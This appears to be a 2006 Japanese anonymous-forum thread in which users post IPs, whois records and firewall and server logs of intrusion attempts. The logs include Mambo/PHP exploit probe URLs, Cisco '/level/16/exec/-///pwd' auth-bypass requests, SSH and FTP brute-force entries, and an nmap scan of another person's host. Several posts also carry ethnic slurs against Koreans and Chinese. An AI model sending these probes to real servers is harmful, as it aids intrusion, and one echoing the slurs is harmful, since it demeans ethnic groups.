p1086-ipad02daianji.nara.ocn.ne.jp

うっぜえw
854名無しさん@お腹いっぱい。:2006/04/06(木) 02:13:16
p2043-ipbf301souka.saitama.ocn.ne.jp

ocnうぜーーーーーーーーーーーーー!
855名無しさん@お腹いっぱい。:2006/04/06(木) 16:56:05
2006/04/06 14:59:50 IP_Filter REJECT UDP 157.56.246.34:30308 > 192.168.2.1:1026 (IP-PORT=7)

何でつか?
ゲイシの会社 Worm に感染しやがりますたか?
856名無しさん@お腹いっぱい。:2006/04/07(金) 00:08:48
d-219-99-247-082.cable.katch.ne.jp
d-219-99-247-106.cable.katch.ne.jp


うざすぎ

しかも同じ会社
857名無しさん@お腹いっぱい。:2006/04/07(金) 02:04:43
IPアドレス202.219.190.177
ホスト名ntgnma066177.gnma.nt.ftth.ppp.infoweb.ne.jp
割当国 日本 (JP)
都道府県群馬県
市外局番--
接続回線光

マジ超ウゼー
858名無しさん@お腹いっぱい。:2006/04/07(金) 03:33:25
218.130.213.160
何か少しでも手がかりが欲しいです
お願いします
859名無しさん@お腹いっぱい。:2006/04/07(金) 07:25:31
>>858
つsoftbank218130213160.bbtec.net
860名無しさん@お腹いっぱい。:2006/04/08(土) 14:32:57
a. [IPネットワークアドレス] 219.100.128.0/17
b. [ネットワーク名] HDD
f. [組織名] 平成電電株式会社
g. [Organization] HEISEI DENDEN CO., LTD.
m. [管理者連絡窓口] TF3168JP
n. [技術連絡担当者] MK11562JP
n. [技術連絡担当者] SK8303JP
p. [ネームサーバ] a.hdd.co.jp
p. [ネームサーバ] b.hdd.co.jp
p. [ネームサーバ] c.hdd.co.jp
[割当年月日] 2002/08/26
[最終更新] 2005/07/06 11:08:09(JST)

上位情報
----------
平成電電株式会社 (HeiseiDenden co., ltd.)
[割り振り] 219.100.0.0/16

下位情報
----------
該当するデータがありません。
861名無しさん@お腹いっぱい。:2006/04/08(土) 19:00:08
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 203.216.224.0/19
b. [ネットワーク名] YAHOO-NET
f. [組織名] ヤフー株式会社
g. [Organization] Yahoo Japan Corp.
m. [管理者連絡窓口] TT9944JP
n. [技術連絡担当者] TT9944JP
p. [ネームサーバ] dnsg01.yahoo.co.jp
p. [ネームサーバ] ns10.yahoo.co.jp
[割当年月日] 2005/03/03
[返却年月日]
[最終更新] 2005/12/21 17:32:02(JST)

上位情報
----------
株式会社ブロードバンドタワー (BroadBand Tower, Inc.)
[割り振り] 203.216.192.0/18
862名無しさん@お腹いっぱい。:2006/04/08(土) 20:56:17
アホばっか
863名無しさん@お腹いっぱい。:2006/04/09(日) 06:18:04
i218-47-19955.s06.a011.ap.plala.or.jp
これひどい><
864名無しさん@お腹いっぱい。:2006/04/10(月) 00:36:41

IPアドレス 169.254.155.70
ホスト名 対応するホスト名がありません
IPアドレス
 割当国 ※ 該当なし
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

IP Spoofing
865名無しさん@お腹いっぱい。:2006/04/10(月) 19:36:56
60.47.159.51 新潟 光
↑しつこい
866名無しさん@お腹いっぱい。:2006/04/11(火) 01:17:50
>>863
plala、Nifty、Biglobe、Yahooがゴミと厨房の巣窟はネット界の常識。
867名無しさん@お腹いっぱい。:2006/04/11(火) 07:59:12
softbank219170244185.bbtec.net
さっきからウザ過ぎる
868名無しさん@お腹いっぱい。:2006/04/12(水) 03:54:30

IPアドレス 210.157.21.146
ホスト名 unused-210-157-021-146.interq.or.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

TCP SYN Flood
869名無しさん@お腹いっぱい。:2006/04/12(水) 06:05:32
どうやって不正アクセスされたのを調べるの?
870名無しさん@お腹いっぱい。:2006/04/12(水) 17:57:54
>>869
FWとかルーターのログを見ればいいんだよ
871::2006/04/13(木) 14:53:01
>>870
見れるんだけど見方が分からん。
どれが不正アクセスなのか。
872名無しさん@お腹いっぱい。:2006/04/13(木) 21:22:11
じゃあ気にしなくていいよ。
気にすると健康に毒だから。
それに(ブロックしたという)ログに残ると言うことは正常にブロックしたということなんだから。
873名無しさん@お腹いっぱい。:2006/04/15(土) 02:04:27
Apr 15 01:10:21 black sshd[1597]: Illegal user staff from 221.248.168.112

数百行省略

Apr 15 01:11:21 black sshd[1255]: Illegal user pgsql from 221.248.168.112

http://221.248.168.112/
ぽわぽわべあのページ


おめでたいヴァカなのか、踏み台にされてるのか。
874名無しさん@お腹いっぱい。:2006/04/15(土) 02:22:59
お前ら、ちゃんとルーター導入しろよ
安価なルーターでもないのとあるのとでは全然違うぞ
不正アクセスのログなんて残ったこと一度もねーし
875名無しさん@お腹いっぱい。:2006/04/15(土) 12:35:17
>>874
おまい馬鹿

ヒント:ブロックログ
876名無しさん@お腹いっぱい。:2006/04/15(土) 12:36:04
>>874
残ってないってすでに侵入されてんじゃねーの?www
877名無しさん@お腹いっぱい。:2006/04/15(土) 17:15:42
ブラウザーハイジャックってどうやるの?
878名無しさん@お腹いっぱい。:2006/04/15(土) 17:21:13
他のパソコンに入るに(リモート)必要操作教えてください
879名無しさん@お腹いっぱい。:2006/04/15(土) 18:07:41
>>877
日本語でおk
880名無しさん@お腹いっぱい。:2006/04/15(土) 19:12:44
IPアドレス 169.254.155.70
ホスト名 対応するホスト名がありません
IPアドレス
 割当国 ※ 該当なし
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

881名無しさん@お腹いっぱい。:2006/04/15(土) 20:16:36
IPアドレス 61.203.122.249
ホスト名 ACCA1Aaa249.hrs.mesh.ad.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 広島県
市外局番 --
接続回線 xDSL
882名無しさん@お腹いっぱい。:2006/04/15(土) 20:42:53
IPアドレス 59.136.101.38
ホスト名 KHP059136101038.ppp-bb.dion.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 神奈川県
市外局番 --
接続回線 光
883名無しさん@お腹いっぱい。:2006/04/15(土) 21:27:12
2006/04/15 21:24:12 NAT RX-INFO TCP Synchronize Flag OFF : TCP 210.142.48.40 : 80 > 61.198.xx.xx : 4120 (IP-PORT=6)
2006/04/15 21:24:15 NAT RX-INFO TCP Synchronize Flag OFF : TCP 210.142.48.40 : 80 > 61.198.xx.xx : 4255 (IP-PORT=6)
2006/04/15 21:24:19 NAT RX-INFO TCP Synchronize Flag OFF : TCP 210.142.48.40 : 80 > 61.198.xx.xx : 4175 (IP-PORT=6)
2006/04/15 21:24:24 NAT RX-INFO TCP Synchronize Flag OFF : TCP 210.142.48.40 : 80 > 61.198.xx.xx : 4297 (IP-PORT=6)
2006/04/15 21:24:25 NAT RX-INFO TCP Synchronize Flag OFF : TCP 210.142.48.40 : 80 > 61.198.xx.xx : 4298 (IP-PORT=6)
2006/04/15 21:24:31 NAT RX-INFO TCP Synchronize Flag OFF : TCP 210.142.48.40 : 80 > 61.198.xx.xx : 4228 (IP-PORT=6)
2006/04/15 21:24:33 NAT RX-INFO TCP Synchronize Flag OFF : TCP 210.142.48.40 : 80 > 61.198.xx.xx : 4406 (IP-PORT=6)
2006/04/15 21:24:34 NAT RX-INFO TCP Synchronize Flag OFF : TCP 210.142.48.40 : 80 > 61.198.xx.xx : 4239 (IP-PORT=6)
ポイントキャスト株式会社
884名無しさん@お腹いっぱい。:2006/04/15(土) 21:29:35
# nmap -O 61.66.34.67

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2006-04-15 09:03 JST
Interesting ports on adsl-61-66-34-67.TC.sparqnet.net (61.66.34.67):
(The 1644 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
68/tcp filtered dhcpclient
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
113/tcp open auth
136/tcp filtered profile
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
143/tcp open imap
443/tcp open https
445/tcp filtered microsoft-ds
593/tcp filtered http-rpc-epmap
4444/tcp filtered krb524
10000/tcp open snet-sensor-mgmt
Device type: general purpose
Running: Linux 2.4.X
OS details: Linux 2.4.20 (Itanium)
Uptime 25.900 days (since Mon Mar 20 11:28:04 2006)

Nmap finished: 1 IP address (1 host up) scanned in 14.952 seconds
885名無しさん@お腹いっぱい。:2006/04/15(土) 22:30:51
IPアドレス 218.219.179.42
ホスト名 fiasb-218-219-179-042.pool.mitene.or.jp
不正侵入された。。。
886名無しさん@お腹いっぱい。:2006/04/16(日) 01:33:08
シナIP  202.97.以下 うぜぇ
887名無しさん@お腹いっぱい。:2006/04/16(日) 03:47:22
ファイアウォールのログ見たら「DROP」がいっぱい…。
こんなに不正アクセスされてたってこと!?
888名無しさん@お腹いっぱい。:2006/04/16(日) 09:52:17
>>887
DROP=不正アクセスを排除したという意味だと思う
889名無しさん@お腹いっぱい。:2006/04/16(日) 14:32:41
220.221.225.17 新潟

77回ノックされますた。
ウザイ
890名無しさん@お腹いっぱい。:2006/04/16(日) 21:10:38
すまんが教えてくれ。N/Aってなんだ?
891名無しさん@お腹いっぱい。:2006/04/16(日) 21:46:15
892名無しさん@お腹いっぱい。:2006/04/16(日) 22:24:38
890だけどN/Aされても大丈夫なのか?
893あぼーん:あぼーん
あぼーん
894名無しさん@お腹いっぱい。:2006/04/18(火) 05:03:33
こいつコンピュータからメールアドレスを取り出そうとしたぞ?

m2f02.yahoo.co.jp 211.14.13.197
895名無しさん@お腹いっぱい。:2006/04/18(火) 19:31:05
もまいらそれをブロックリストにして PeerGuardian2 で防ごうぜ?それぐらいは出来るだろ?
896名無しさん@お腹いっぱい。:2006/04/18(火) 20:42:51
PG2で中韓香を塞いだらWindows Updateからパッチが落とせなくなって焦った
897名無しさん@お腹いっぱい。:2006/04/18(火) 20:53:07
んなこたーない
898名無しさん@お腹いっぱい。:2006/04/19(水) 23:36:48
203.216.235.248
オレはWEBサーバなんか立ててねーつーの。
899名無しさん@お腹いっぱい。:2006/04/19(水) 23:41:32
IPアドレス 211.2.29.221
ホスト名 ntiskw028221.iskw.nt.adsl.ppp.infoweb.ne.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 石川県
市外局番 --
接続回線 xDSL
900名無しさん@お腹いっぱい。:2006/04/20(木) 02:49:02

poppass (パスワード変更) 106 TCP
140.111.130.27 pc17.eces.ilc.edu.tw

Ministry of Education Computer Center
12th Fl, 106, Hoping E. Road, Sec 2.
Taiwan Republic of China, R.O.C
TW

Domain Name: edu.tw

Contact:
TANet, Administrator [email protected]
886-2-87329007


これ何すか???何だよ?パスワード変更って何かこぇぇよ
台湾の人なんなのさー
901名無しさん@お腹いっぱい。:2006/04/20(木) 15:24:39
61.115.76.253 : sljiyu.st.wakwak.ne.jp.

SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1

61.115.76.253 - - [20/Apr/2006:10:53:05 +0900] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST
61.115.76.253 - - [20/Apr/2006:10:53:09 +0900] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST
61.115.76.253 - - [20/Apr/2006:10:53:10 +0900] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid
61.115.76.253 - - [20/Apr/2006:10:53:15 +0900] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]
61.115.76.253 - - [20/Apr/2006:10:53:16 +0900] "POST /xmlrpc.php HTTP/1.1" 404 208
61.115.76.253 - - [20/Apr/2006:10:53:17 +0900] "POST /drupal/xmlrpc.php HTTP/1.1" 404 215
61.115.76.253 - - [20/Apr/2006:10:53:18 +0900] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 221
61.115.76.253 - - [20/Apr/2006:10:53:19 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 218

毎日やってきていい加減しつこいです。
902名無しさん@お腹いっぱい。:2006/04/20(木) 15:32:18
p5159-ip01daianji.nara.ocn.ne.jp

奈良の大安寺から何の用だ?
903名無しさん@お腹いっぱい。:2006/04/20(木) 16:03:28
eme5.amec.med.yamaguchi-u.ac.jp
904名無しさん@お腹いっぱい。:2006/04/21(金) 10:12:12
202.248.237.134

portscanされました
905名無しさん@お腹いっぱい。:2006/04/21(金) 20:49:34
>>902
ウイルスに感染してんじゃない?
おしえてあげたら?
906名無しさん@お腹いっぱい。:2006/04/22(土) 13:55:00
たまたまネットワークをモニタリングしたら怪しいアクセスが、

IPアドレス 221.143.46.192
ホスト名 対応するホスト名がありません
IPアドレス
 割当国 ※ 韓国 (KR)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

調べてみたらport:22を突っついててあがんの。
チョンコウ馬鹿じゃねぇか氏ねや
今も昔も変わらずやることが汚い民族ですね。
民族の誇りっという物がないのだろうか。
埃しか揃っていない民族に求めても無駄か。
907名無しさん@お腹いっぱい。:2006/04/23(日) 12:22:02
アホーは元気だな

IPアドレス 221.24.143.27
ホスト名 softbank221024143027.bbtec.net
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 静岡県
市外局番 --
接続回線 xDSL
908名無しさん@お腹いっぱい。:2006/04/23(日) 20:06:21
IPアドレス 61.156.42.103
ホスト名 対応するホスト名がありません
IPアドレス
割当国 ※ 中国 (CN)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

PG2(中韓香ブロック)入れてあるのに・・・
909名無しさん@お腹いっぱい。:2006/04/24(月) 00:05:51
61.12.172.122
122.172.12.61.ap.gmo-access.jp
910名無しさん@お腹いっぱい。:2006/04/24(月) 19:13:20
,rn                       \从从从从从从从从从从/
   r「l l h.                      ≫人類の太陽金正日大将軍が
   | 、. !j         /           /  ≫民族の翼ノドンに乗って
   ゝ .f  /      _             ≫華麗に910getニダ!!!
   |  |       ,r'⌒  ⌒ヽ、.         ≫ウリは神なり!!!!
   ,」  L_     f ,,r' ̄ ̄ヾ. ヽ.  / ./   ≫ゴミども頭が高いニダ!!!!
  ヾー‐' |     ゞ‐=H:=‐fー)r、)  ./      /WWWWWWWWWW\
   |   じ、     ゙iー'・・ー' i.トソ
   \    \.     l、 r==i ,; |'
    \   ノリ^ー->==__,..-‐ヘ__.  /   /|  /
      \  ノ ハヽ  |_/oヽ__/   /\   /  |_  ゴゴゴゴ…
       \  /    /       /  \./  /  ヽ___
         \'    |o    O  ,|    \ ../   /   /
          y'   |        |\/  |   ./   /
          |     |o        |/| _ |  ./__/
          |    |       |  「  \:"::/
          ヾニコ[□]ニニニ  |   ⌒ リ川::/
          / \      /  \  ...::::/
         /    ゞ___     \/  /
           /     /    \.     \  /
        /  ゝ /       .::\ /    |
          |   /      ....:::::::::/\<    |    /
          | /      ...::::::::::/  |   |     /
       /      ....:::::::/    |     .|
      /      ...::::::::/     |   |
    /      .....::::::/       |___|   /
   /''' ....   ...:::::::::/         (   \__
   /     ...:::::::::/           ゙-'`ー---'
911名無しさん@お腹いっぱい。:2006/04/25(火) 17:37:36
検索結果
IPアドレス 206.223.151.67
ホスト名 tiger509.maido3.com
IPアドレス
割当国 ※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
912名無しさん@お腹いっぱい。:2006/04/26(水) 04:05:37
>>911
おまえ、ここにアクセスしてんだろ?
913名無しさん@お腹いっぱい。:2006/04/26(水) 04:20:06
ぐぐればすぐに分かりそうなもんなんだがなあ>911
914名無しさん@お腹いっぱい。:2006/04/27(木) 02:06:32
59.34.196.88
うざ
915名無しさん@お腹いっぱい。:2006/04/30(日) 04:19:33
211.123.234.206
これも
916名無しさん@お腹いっぱい。:2006/04/30(日) 04:39:21
210.173.169.161 www3.asahi.com ←しつこい
917名無しさん@お腹いっぱい。:2006/04/30(日) 04:56:36
>>916
Firefox使ってないか?
918名無しさん@お腹いっぱい。:2006/04/30(日) 10:47:12
すいませんセキュリティ初心者質問スレが荒れてるのでここで質問
させてください。
自分のIPアドレス変えるにはどうしたらよろしいのでしょうか?
Bフレッツ光に加入してるのですが、フレッツ接続ツールをアンインスコ
してまたインスコし直せばよいのでしょうか?
それともリカバリでクリーンインスコすればよろしいのでしょうか?
919名無しさん@お腹いっぱい。:2006/04/30(日) 22:28:43 BE:613713986-
切断して二日ぐらい放置してから再接続したら?
920名無しさん@お腹いっぱい。:2006/04/30(日) 23:33:07
自分の使用プロバイダのスレ行け
921名無しさん@お腹いっぱい。:2006/05/01(月) 09:22:11
>>920
わかりました。
922名無しさん@お腹いっぱい。:2006/05/01(月) 13:44:27
IPアドレス 218.225.14.211
ホスト名 cr211.ade.point.ne.jp
↑うざいんです。
923名無しさん@お腹いっぱい。:2006/05/01(月) 18:24:28
58.51.164.100
219.148.175.167
218.57.168.203
60.176.103.57
218.57.94.241
59.56.103.119
222.243.156.234
222.183.17.18
222.241.79.122
222.241.101.226
60.161.193.249
211.101.61.32
218.77.87.251
58.208.1.160
222.85.31.57
222.81.145.82
58.212.103.56

きょうはお客さんが多いんだが。
924名無しさん@お腹いっぱい。:2006/05/01(月) 19:26:21
IANAがUDP5353にしつこいのはなぜ?内部の共有やってないのに
925名無しさん@お腹いっぱい。:2006/05/02(火) 03:51:46
IPアドレス 222.2.191.220
ホスト名 ZG191220.ppp.dion.ne.jp
割当国  ※ 日本 (JP)
都道府県 兵庫県
市外局番 --
接続回線 光

こいつは、本当にしつこい。
926名無しさん@お腹いっぱい。:2006/05/02(火) 04:23:51
vsftpd:
Unknown Entries:
authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=222.147.156.209 : 297 Time(s)
check pass; user unknown: 297 Time(s)

うぉっほ、久しぶりにがんがってる奴が来た
Name: p12209-ipadfx01niho.hiroshima.ocn.ne.jp
Address: 222.147.156.209
927名無しさん@お腹いっぱい。:2006/05/02(火) 10:00:54
なんつのかな。2chが某宗教団体にのっとられてることは衆知なわけで、
それでもこのスレがあるってことは…

相も変らぬ嫌韓中育てな。参考にはさせてもらう。
928名無しさん@お腹いっぱい。:2006/05/02(火) 10:29:11
?誤爆?
929名無しさん@お腹いっぱい。:2006/05/02(火) 15:07:19
意味不明
930名無しさん@お腹いっぱい。:2006/05/02(火) 20:50:54
,rn                       \从从从从从从从从从从/
   r「l l h.                      ≫人類の太陽金正日大将軍が
   | 、. !j         /           /  ≫民族の翼ノドンに乗って
   ゝ .f  /      _             ≫華麗に930getニダ!!!
   |  |       ,r'⌒  ⌒ヽ、.         ≫ウリは神なり!!!!
   ,」  L_     f ,,r' ̄ ̄ヾ. ヽ.  / ./   ≫ゴミども頭が高いニダ!!!!
  ヾー‐' |     ゞ‐=H:=‐fー)r、)  ./      /WWWWWWWWWW\
   |   じ、     ゙iー'・・ー' i.トソ
   \    \.     l、 r==i ,; |'
    \   ノリ^ー->==__,..-‐ヘ__.  /   /|  /
      \  ノ ハヽ  |_/oヽ__/   /\   /  |_  ゴゴゴゴ…
       \  /    /       /  \./  /  ヽ___
         \'    |o    O  ,|    \ ../   /   /
          y'   |        |\/  |   ./   /
          |     |o        |/| _ |  ./__/
          |    |       |  「  \:"::/
          ヾニコ[□]ニニニ  |   ⌒ リ川::/
          / \      /  \  ...::::/
         /    ゞ___     \/  /
           /     /    \.     \  /
        /  ゝ /       .::\ /    |
          |   /      ....:::::::::/\<    |    /
          | /      ...::::::::::/  |   |     /
       /      ....:::::::/    |     .|
      /      ...::::::::/     |   |
    /      .....::::::/       |___|   /
   /''' ....   ...:::::::::/         (   \__
   /     ...:::::::::/           ゙-'`ー---'
931名無しさん@お腹いっぱい。:2006/05/02(火) 23:35:44
61.180.228.245

黄砂と同じで毎日くるよ。
氏ねよシナチク
932名無しさん@お腹いっぱい。:2006/05/03(水) 02:28:52
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 218.227.0.0/16
b. [ネットワーク名] BIGLOBE-5
f. [組織名] BIGLOBEサービス(日本電気株式会社)
g. [Organization] NEC Corporation
m. [管理者連絡窓口] NK032JP
n. [技術連絡担当者] MK11728JP
p. [ネームサーバ] ns02.mesh.ad.jp
p. [ネームサーバ] ns03.mesh.ad.jp
[割当年月日] 2002/02/20
[最終更新] 2004/04/12 17:47:01(JST)

上位情報
----------
日本電気株式会社 (NEC Corporation)
[割り振り] 218.227.0.0/16

下位情報
----------
該当するデータがありません。

なんか知らんけどリモートアクセスしてくる。
933名無しさん@お腹いっぱい。:2006/05/03(水) 02:30:50
218.227.145.20
934名無しさん@お腹いっぱい。:2006/05/03(水) 22:16:16
217.126.16.209 ←どうやらstaticらしい

My鯖(Linux)のProFTPDに向かってAdministratorで
先月26日に2時間総当たりかけてきた。
935名無しさん@お腹いっぱい。:2006/05/03(水) 23:00:18
>>934
スペインからの総攻撃
936名無しさん@お腹いっぱい。:2006/05/04(木) 01:31:01
[2006-05-03 01:12:45] 219.159.68.194
[2006-05-03 02:37:44] 61.136.223.176
[2006-05-03 13:11:09] 61.134.60.18
[2006-05-03 16:27:00] 61.185.198.180
[2006-05-03 16:32:12] 72.17.143.251
[2006-05-03 17:24:55] 202.104.236.52
[2006-05-03 19:13:36] 61.175.163.195
[2006-05-03 23:23:04] 61.175.163.195
937名無しさん@お腹いっぱい。:2006/05/04(木) 18:03:59
IPアドレス 219.26.60.32
ホスト名 softbank219026060032.bbtec.net
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 兵庫県
市外局番 --
接続回線 xDSL

ズレータ・・・。
938名無しさん@お腹いっぱい。:2006/05/04(木) 18:20:18
http://jbbs.livedoor.jp/travel/2528/
ここへいったんですがやたら同じIPをブロックします
管理人の仕業でしょうか?以前ここに貼られていた所です。
939名無しさん@お腹いっぱい。:2006/05/04(木) 20:07:56
58.94.102.122 - - [04/May/2006:15:06:39 +0900] "GET / HTTP/1.0" 200 2857 "-" "Yamada-Search/0.21 (Windows NT/5.1; Build 2600; Service Pack 1)"

俺はLinuxだって。
940名無しさん@お腹いっぱい。:2006/05/04(木) 20:23:27
Apr 29 18:22:02 localhost xinetd[442]: START: telnet pid=1326 from=221.241.89.93
Apr 29 18:22:02 localhost xinetd[442]: START: telnet pid=1327 from=221.241.89.93
Apr 30 16:16:08 localhost xinetd[442]: START: telnet pid=9393 from=221.241.89.93
Apr 30 16:16:08 localhost xinetd[442]: START: telnet pid=9394 from=221.241.89.93
May 4 00:00:06 localhost xinetd[442]: START: telnet pid=11269 from=221.241.89.93
May 4 00:00:06 localhost xinetd[442]: START: telnet pid=11270 from=221.241.89.93
May 4 05:37:19 localhost xinetd[442]: START: telnet pid=836 from=221.241.89.93
May 4 05:37:19 localhost xinetd[442]: START: telnet pid=837 from=221.241.89.93

ポートスキャナ? 毎回認証前で閉じてる。
会社:FTTH@USEN
941名無しさん@お腹いっぱい。:2006/05/04(木) 21:03:29
うちの掲示板に異なる人から
書き込みがあるのですが、自演くさいのです。
この3つは同じ人でしょうか・・・
初心者ですみません。

p8024-ipad14aobadori.miyagi.ocn.ne.jp

p5241-ipad10aobadori.miyagi.ocn.ne.jp

p8155-ipad13aobadori.miyagi.ocn.ne.jp
942名無しさん@お腹いっぱい。:2006/05/04(木) 21:32:46
ネカフェ
943名無しさん@お腹いっぱい。:2006/05/04(木) 22:40:48
すいませんセキュリティ初心者質問スレが荒れてるのでここで質問
させてください。
自分のIPアドレス変えるにはどうしたらよろしいのでしょうか?
Bフレッツ光に加入してるのですが、フレッツ接続ツールをアンインスコ
してまたインスコし直せばよいのでしょうか?
それともリカバリでクリーンインスコすればよろしいのでしょうか?
944あぼーん:あぼーん
あぼーん
945名無しさん@お腹いっぱい。:2006/05/04(木) 22:46:57
>>943
アク禁乙
946名無しさん@お腹いっぱい。:2006/05/05(金) 03:14:24
210.20.66.9:25863
947名無しさん@お腹いっぱい。:2006/05/05(金) 13:12:51
IPアドレス 220.213.199.82
ホスト名 kctv84082.ccnw.ne.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 愛知県
市外局番 0568
接続回線 CATV
948名無しさん@お腹いっぱい。:2006/05/06(土) 06:07:40
IP: 202.219.237.76
ntgifu092076.gifu.nt.adsl.ppp.infoweb.ne.jp
949名無しさん@お腹いっぱい。:2006/05/06(土) 19:00:14
IPアドレス 203.133.141.101
ホスト名 pc129101.ztv.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 和歌山県
市外局番 --
接続回線 CATV
950名無しさん@お腹いっぱい。:2006/05/06(土) 20:19:47
,rn                       \从从从从从从从从从从/
   r「l l h.                      ≫人類の太陽金正日大将軍が
   | 、. !j         /           /  ≫民族の翼ノドンに乗って
   ゝ .f  /      _             ≫華麗に950getニダ!!!
   |  |       ,r'⌒  ⌒ヽ、.         ≫ウリは神なり!!!!
   ,」  L_     f ,,r' ̄ ̄ヾ. ヽ.  / ./   ≫ゴミども頭が高いニダ!!!!
  ヾー‐' |     ゞ‐=H:=‐fー)r、)  ./      /WWWWWWWWWW\
   |   じ、     ゙iー'・・ー' i.トソ
   \    \.     l、 r==i ,; |'
    \   ノリ^ー->==__,..-‐ヘ__.  /   /|  /
      \  ノ ハヽ  |_/oヽ__/   /\   /  |_  ゴゴゴゴ…
       \  /    /       /  \./  /  ヽ___
         \'    |o    O  ,|    \ ../   /   /
          y'   |        |\/  |   ./   /
          |     |o        |/| _ |  ./__/
          |    |       |  「  \:"::/
          ヾニコ[□]ニニニ  |   ⌒ リ川::/
          / \      /  \  ...::::/
         /    ゞ___     \/  /
           /     /    \.     \  /
        /  ゝ /       .::\ /    |
          |   /      ....:::::::::/\<    |    /
          | /      ...::::::::::/  |   |     /
       /      ....:::::::/    |     .|
      /      ...::::::::/     |   |
    /      .....::::::/       |___|   /
   /''' ....   ...:::::::::/         (   \__
   /     ...:::::::::/           ゙-'`ー---'
951名無しさん@お腹いっぱい。:2006/05/06(土) 22:30:38
221.241.120.7 - - [04/May/2006:21:17:14 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-"
221.241.120.7 - - [04/May/2006:21:30:56 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-"
221.241.120.7 - - [04/May/2006:21:37:28 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-"
221.241.120.7 - - [04/May/2006:22:23:40 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-"
221.241.120.7 - - [05/May/2006:05:28:33 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-"
221.241.120.7 - - [05/May/2006:08:19:28 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-"
221.241.120.7 - - [05/May/2006:13:51:56 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-"
221.241.120.7 - - [05/May/2006:16:22:20 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-"
221.241.120.7 - - [05/May/2006:18:05:00 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-"
221.241.120.7 - - [05/May/2006:18:35:45 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-"
221.241.120.7 - - [05/May/2006:18:53:57 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-"
221.241.120.7 - - [05/May/2006:20:21:36 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-"
221.241.120.7 - - [05/May/2006:21:52:15 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-"
221.241.120.7 - - [05/May/2006:23:26:04 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-"
221.241.120.7 - - [06/May/2006:03:09:02 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-"
221.241.120.7 - - [06/May/2006:03:15:35 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-"
221.241.120.7 - - [06/May/2006:07:21:07 +0900] "GET /level/16/exec/-///pwd HTTP/1.0" 404 255 "-" "-"

しつこい。現時点でReply有り
952名無しさん@お腹いっぱい。:2006/05/06(土) 22:33:05
>>951
May 5 01:37:45 localhost xinetd[442]: START: telnet pid=1427 from=221.241.120.7
May 5 01:37:45 localhost xinetd[442]: START: telnet pid=1428 from=221.241.120.7
May 5 02:58:02 localhost xinetd[442]: START: telnet pid=1461 from=221.241.120.7
May 5 02:58:02 localhost xinetd[442]: START: telnet pid=1462 from=221.241.120.7
May 5 03:14:00 localhost xinetd[442]: START: telnet pid=1477 from=221.241.120.7
May 5 03:14:01 localhost xinetd[442]: START: telnet pid=1478 from=221.241.120.7
May 5 15:59:08 localhost xinetd[442]: START: telnet pid=1955 from=221.241.120.7
May 5 15:59:08 localhost xinetd[442]: START: telnet pid=1956 from=221.241.120.7
May 5 23:07:11 localhost xinetd[442]: START: telnet pid=2182 from=221.241.120.7
May 5 23:07:11 localhost xinetd[442]: START: telnet pid=2183 from=221.241.120.7

Apacheだけじゃなかった・・・
953名無しさん@お腹いっぱい。:2006/05/07(日) 01:39:25
>>949
残念でした1つズレてしまいましたね。さすが大将軍。
954名無しさん@お腹いっぱい。:2006/05/07(日) 06:53:08
222.122.199.8

211.154.222.56
61.186.252.158
60.190.232.32
955名無しさん@お腹いっぱい。:2006/05/07(日) 17:38:49
すいませんこのIPの情報わかりませんか?
IP:203.180.88.45 です
よろしくお願いいたします。
956名無しさん@お腹いっぱい。:2006/05/07(日) 18:30:51

Domain Information: [ドメイン情報]
a. [ドメイン名] MESH.AD.JP
e. [そしきめい] にっぽんでんきかぶしきがいしゃ
f. [組織名] 日本電気株式会社
g. [Organization] NEC Corporation
k. [組織種別] JPNIC会員ネットワーク
l. [Organization Type] JPNIC Member's Network
m. [登録担当者] NK032JP
n. [技術連絡担当者] SK4819JP
p. [ネームサーバ] ns02.mesh.ad.jp
